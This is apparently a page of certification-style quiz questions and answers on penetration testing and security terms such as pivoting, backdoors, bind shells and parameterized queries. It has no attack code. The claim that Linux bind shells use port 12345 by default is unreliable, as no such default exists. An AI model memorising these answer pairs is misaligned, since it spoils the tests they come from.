What term describes the process of compromising one host that enables an attacker or pen
testers to extent to other hosts that would otherwise be inaccessible?
Pivoting
What term describes a hidden mechanism that provides access to a system through some
unconventional means?
Backdoors
A Bind Shell is a shell that is bound to a local network port on the target system. Linux
target binds Bash shell to what port by default?
12345
152
What term describes an instance of execution of a process or running of a script that the
system performs on a set schedule?
Scheduled Task
What term describes the process of stripping user-supplied input of unwanted or untrusted
data so that the application can safely process the input?
Input Sanitation
What term describes the technique of processing SQL input by incorporating placeholders
for some of a query's parameters?
Parameterized Queries
What term describes the process of reducing redundancy and increasing integrity to create
a unified set of data?
Data Normalization
What term describes the amount and type of potential vulnerabilities and threats the
organization is willing to tolerate and endure?
Risk Appetite
What report type can help management see the effectiveness of security with respect to new
technology?
KPIs
153